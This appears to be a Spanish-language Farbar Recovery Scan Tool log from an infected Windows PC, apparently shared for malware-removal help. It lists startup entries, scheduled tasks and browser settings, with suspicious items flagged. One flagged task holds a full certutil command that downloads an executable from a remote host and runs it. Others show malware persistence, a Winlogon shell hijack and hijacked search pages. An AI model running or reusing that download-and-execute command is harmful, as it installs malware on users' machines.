HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-16] (InstallShield Software Corporation) [Archivo no firmado]
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard Company -> Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [Chromium] => "c:\users\marco avila\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory=Default --restore-last-session
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [FloralShape] => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [2301610] => C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe [780875 2020-03-26] ( ) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CloudNet] => C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-03-26] (EpicNet Inc.) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCIÓN
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
IFEO\OSPPSVC.EXE: [Debugger] [email protected]
IFEO\SppSvc.exe: [Debugger] [email protected]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer VCM.lnk [2009-12-01]
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Acer Incorporated) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Real-Time Daemon.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Real-Time Daemon.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe (Clarus, Inc.) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Scheduler.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Scheduler.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe (Clarus, Inc.) [Archivo no firmado]
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restricción ? <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {004429EA-5244-4EBD-8904-9A0C64418CB1} - System32\Tasks\{E42A772A-328E-4927-BE90-5CCB2A81671D} => C:\Program Files (x86)\RAR Password Cracker\rpc.exe
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] <==== ATENCIÓN
Task: {0914E1B1-22EB-4FEB-8194-425AA2933CBD} - System32\Tasks\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T\Setup.exe" -d "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T"
Task: {0CE184F9-C9A3-4546-9EDC-E5C5536E1418} - System32\Tasks\{3677C5C1-371D-4C65-8D9F-49AA4F00395C} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {0D42BDA2-8B8C-4481-A692-92E37D95D75F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {13693098-6F67-419B-B05D-CFB3FE93C43E} - System32\Tasks\{42B0B5F8-0992-46F6-B000-D55521296966} => C:\Program Files (x86)\DVDVideoSoft\Free Studio\Free Video Dub\FreeVideoDub.exe [1430168 2012-02-22] (DVDVideoSoft Ltd. -> DVDVideoSoft Ltd.) [Archivo no firmado]
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {239BEED9-169D-4095-B05B-F49FF381B453} - System32\Tasks\{2B17A2B9-CF03-415D-BC43-221C4C331B14} => C:\Users\MARCO AVILA\Desktop\UVCDriver-V2.5-for web-x86&x64-20100611\setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2AB8537C-159B-455D-9813-C7CB0BC69A90} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://promusic.website/app/app.exe C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ningún archivo <==== ATENCIÓN
Task: {33E26D4E-53A5-4732-9AB1-5C72A6706A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4019DA72-1B00-4FAD-8052-F0518E2C1509} - System32\Tasks\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es\MovieMaker2.1.1.exe" -d "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es"
Task: {45BDE75E-7158-40F8-BE0E-4EDAA215FCBF} - System32\Tasks\FreeDownloadManagerNetworkMonitor => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe [895688 2017-07-26] (Softdeluxe Ltd. -> FreeDownloadManager.org)
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {48185BB3-FC80-4AC8-82B8-38BFFAE0455F} - System32\Tasks\{025EAD11-7928-4F28-8569-C009EE9DCFED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Nueva carpeta\LAN_Atheros_v1.0.0.10_Win7x86x64\setup.exe" -d "C:\Users\MARCO AVILA\Desktop\Nueva carpeta\LAN_Atheros_v1.0.0.10_Win7x86x64"
Task: {4C1B364A-AEB9-4F3A-82D7-9451A6296477} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {4CC75682-B56F-44A7-BB3A-701756EB412D} - System32\Tasks\Erocketing Disk Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Erocketing Disk Software\Erocketing Disk Software.dll",yCieHAfJDmzQ <==== ATENCIÓN
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {58A086E0-42EF-44B5-BD5E-4845892442E1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Task: {5C5F48DD-AAC1-4A2B-826F-9791035D4DC1} - System32\Tasks\{76188DFE-44A0-4E86-B159-FCBB9C714646} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 (PORTABLE)\PhotoshopPortable.exe" -d "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 (PORTABLE)"
Task: {629B73C5-E911-4CC8-B4EE-1269D96C4357} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS.exe
Task: {65927409-4FCF-45C9-8D28-8617582F8DC1} - System32\Tasks\{37C356D6-A910-448F-B5DD-7BB89821D0AD} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {674E4BF1-02A9-436F-A485-7B769400D288} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {69A5FF54-77C5-426F-ACF5-015F5A789300} - System32\Tasks\{C0B8A7A4-2234-4D94-ABDC-8D51C0DF69C0} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {721A677F-BD8C-4516-AFF3-3E6E2F7092D6} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic path OfficeSoftwareProtectionProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {74CABDCB-9BD1-4670-B1C3-D6D9B16E5E06} - System32\Tasks\{F0BF1A23-AAD0-476B-B0AA-DB333FC92FFE} => C:\Program Files (x86)\USB2.0 PC Camera\CamApp.exe
Task: {7D310AAB-358D-447D-BDBB-005B3CD5F610} - System32\Tasks\Product Updater => C:\Program Files (x86)\Freemore Video to GIF Converter\FFProductUpdater.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8236BBBF-4E5C-4DC9-93BE-B7DDF95B8A52} - System32\Tasks\{1009BAC7-3A0A-4541-BD6F-681906513587} => C:\Users\MARCO AVILA\Desktop\Autocad 2011 (32bits)\Setup.exe
Task: {8247DF90-7C32-494A-B60B-9F24F1954183} - System32\Tasks\{1D9CB6C2-F9B3-41AE-B8EB-6EFB93E52C1A} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {8504F7E2-D1B2-4255-BDFC-71978BC3D2BD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {8B9CDFF2-ADD7-4844-9E21-432EE136C396} - System32\Tasks\{632ACBA7-5CBB-4A11-8140-A3E251857ACB} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbono\EAUninstall.exe"
Task: {8F9F0FAB-D1E7-494A-80BE-2F4B25FD6ACA} - System32\Tasks\{DFB5321F-790B-449D-A375-ED2396BB0BA7} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {968BD611-9D62-4C37-B71A-BA21308BDE53} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
Task: {9A07DFF4-A42D-4948-B3FA-A7C3A68E7E98} - System32\Tasks\{B04818A1-4C6F-4BD3-B98B-5C67A017F2F1} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {A19BCAF8-246C-4F2A-AC23-4A816DEDFE85} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MARCO AVILA\AppData\Roaming\\timerutc\\utct.exe [67584 2017-03-17] () [Archivo no firmado]
Task: {A595D2D3-1731-4800-A267-E134D77EE33D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {A764EF5F-64B9-462D-A1E2-4859F0E01865} - System32\Tasks\{F3C2F9CF-6BD4-4E8D-A408-E8C4ED283735} => C:\Windows\system32\pcalua.exe -a C:\Windows\unvise32qt.exe -c C:\Windows\system32\QuickTime\Uninstall.log
Task: {BA81CED1-BD06-47C7-9499-6FFEEEB126E2} - System32\Tasks\{7F1A3294-4CFB-49BB-B5A4-5B003C204FE8} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {BCBC6656-A8B4-4C55-ADE0-4685D48896C8} - System32\Tasks\{A29A3ABC-F9AF-40F0-BE92-C29D4288F38F} => C:\Program Files (x86)\TubeDigger\TubeDigger.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C044705F-5982-492D-8273-246A395D7060} - System32\Tasks\{43D3B180-FDF4-4F21-B348-8DC9469A320D} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {C0DBCC98-BB2A-447E-8147-5E4759E9D96D} - System32\Tasks\System\SystemCheck => C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe [6979584 2020-03-25] () [Archivo no firmado] <==== ATENCIÓN
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: {C8BF051C-D43A-4939-9FF4-D25C9BECFD83} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {DBB0A5E7-0BC0-4069-BA6A-C18F6DE2AB8F} - System32\Tasks\{1BBE0B68-556F-4A59-9423-95B718E85946} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A"
Task: {DC572F9E-E54E-411E-8140-DA92E12273D4} - System32\Tasks\Uninstaller_SkipUac_MARCO_AVILA => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {E29389DD-8D0F-4557-BF1A-6B61736B639E} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {E96C7094-CDA4-4D64-9B97-EBEC24982707} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {E9E54652-C473-4C56-83B9-E608F8FB8CA7} - System32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {F5463463-DA4C-4222-898B-C5DBA5360B88} - System32\Tasks\{6A8747E5-3A68-441E-982D-533C6939C771} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Xilisoft\Video Converter Ultimate 6\Uninstall.exe"
Task: {F8891381-1E66-4481-8026-D3BB981AE07A} - System32\Tasks\{F96B9AC3-8FB4-42B5-9EF3-B8BCFA1FAC64} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {FFC54FF7-C9D4-40A6-959F-E9D45F8C20B0} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This task detecct has update for sdk files.up <==== ATENCIÓN

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137
Tcpip\..\Interfaces\{4CA491EE-4CD0-45CF-BC52-51C254C4A7B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{7AD1033E-FE1D-4D56-A9E9-134D6AEF16DB}: [DhcpNameServer] 10.0.196.141 200.77.146.137 200.52.170.150
Tcpip\..\Interfaces\{86463265-C657-4234-94AF-E401DE4093E0}: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkhHkUrzx4laegF9Lsrn6cGbBWaoxAyveZb_5f6wMIg7Y3I3uS7FKPtPsc4G5boKB1HV0Dzm1ClsgtcfQ-gepV-CvwsW
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://mx.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10315__171019__yaie&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1649130365-987012723-906343211-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBAcdbTT-oGb_ZTsWSwcXPEgtxc87bVbNFvUCtIV3lSo6Gn_3bcNUKENR4Vw-7jVBisYV2uszdV6dakSaeMIPY2Pkr2GkRZIONN70OCf99cCSJTk6WFrjDGVfUkKdraCl3qzEJprJAEorPIf6PzgNYXqZibmgQY5QDWgjAlvbDt3QcFb1KHA3Yo&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll [2010-07-16] (Zeon Corporation -> Zeon Corporation)
BHO-x32: Aplicación auxiliar de inicio de sesión de Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: IEInspector Browser Helper -> {9B43B7B1-BF56-4708-81D2-332D708B0DD9} -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\IEInspectorBHO.dll [2017-04-12] (QingHai -> IEInspector Software)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler: WSISAllmytubechrome - Sin valor CLSID

FireFox:
========
